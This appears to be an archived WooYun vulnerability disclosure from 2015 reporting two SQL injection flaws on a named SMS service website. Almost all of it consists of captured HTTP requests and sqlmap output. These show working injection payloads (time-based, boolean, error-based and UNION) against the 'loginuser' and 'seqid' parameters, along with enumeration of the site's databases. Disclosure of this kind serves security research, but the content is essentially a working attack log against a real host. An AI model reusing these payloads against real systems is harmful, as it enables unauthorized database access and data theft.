乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-14: 细节已通知厂商并且等待厂商处理中 2015-07-19: 厂商已经主动忽略漏洞,细节向公众公开
RT
第一处注入:
GET /user_findloginuser.jsp?loginuser=admin HTTP/1.1Host: sms.iddsms.comUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.1.2238.18 Safari/537.36Accept: */*Referer: http://sms.iddsms.com/fgpaswd.jspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=EB7432D3B39E5A8AADFF7DE31F54460A
GET parameter 'loginuser' is vulnerable. Do you want to keep testing the others(if any)? [y/N] nsqlmap identified the following injection points with a total of 93 HTTP(s) requests:---Parameter: loginuser (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: loginuser=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))RKKk) AND 'qxiH'='qxiH---[14:49:52] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0.12[14:49:52] [INFO] fetching database names[14:49:52] [INFO] fetching number of databases[14:49:52] [INFO] retrieved:[14:49:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y2[14:50:09] [INFO] retrieved:[14:50:14] [INFO] adjusting time delay to 4 seconds due to good response times[14:50:34] [ERROR] invalid character detected. retrying..[14:50:34] [WARNING] increasing time delay to 5 seconds[14:50:55] [ERROR] invalid character detected. retrying..[14:50:55] [WARNING] increasing time delay to 6 secondsinformation_schema[14:59:32] [INFO] retrieved: w[15:00:31] [ERROR] invalid character detected. retrying..[15:00:31] [WARNING] increasing time delay to 7 secondsebsm[15:03:08] [ERROR] invalid character detected. retrying..[15:03:08] [WARNING] increasing time delay to 8 secondss[15:04:35] [ERROR] invalid character detected. retrying..[15:04:35] [WARNING] increasing time delay to 9 secondssavailable databases [2]:[*] information_schema[*] websmss[15:05:18] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\sms.iddsms.com'
第二处注入:
GET /manager/base/tailmt.jsp?seqid=1262236 HTTP/1.1Host: sms.iddsms.comCache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.1.2238.18 Safari/537.36Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=EB7432D3B39E5A8AADFF7DE31F54460A
sqlmap identified the following injection points with a total of 43 HTTP(s) requests:---Parameter: seqid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: seqid=1262236' AND 9000=9000 AND 'zfLF'='zfLF Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: seqid=1262236' AND (SELECT 5252 FROM(SELECT COUNT(*),CONCAT(0x7162717871,(SELECT (ELT(5252=5252,1))),0x71627a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bYNj'='bYNj Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: seqid=1262236' AND (SELECT * FROM (SELECT(SLEEP(5)))WYNu) AND 'uALS'='uALS Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: seqid=-2842' UNION ALL SELECT CONCAT(0x7162717871,0x4362637344627a52594b,0x71627a6271)-----[15:00:48] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0[15:00:48] [INFO] fetching database names[15:00:48] [INFO] the SQL query used returns 2 entries[15:00:49] [INFO] retrieved: information_schema[15:00:49] [INFO] retrieved: websmssavailable databases [2]:[*] information_schema[*] websmss[15:00:50] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\sms.iddsms.com'[*] shutting down at 15:00:50
危害等级:无影响厂商忽略
忽略时间:2015-07-19 16:10
漏洞Rank:4 (WooYun评价)
暂无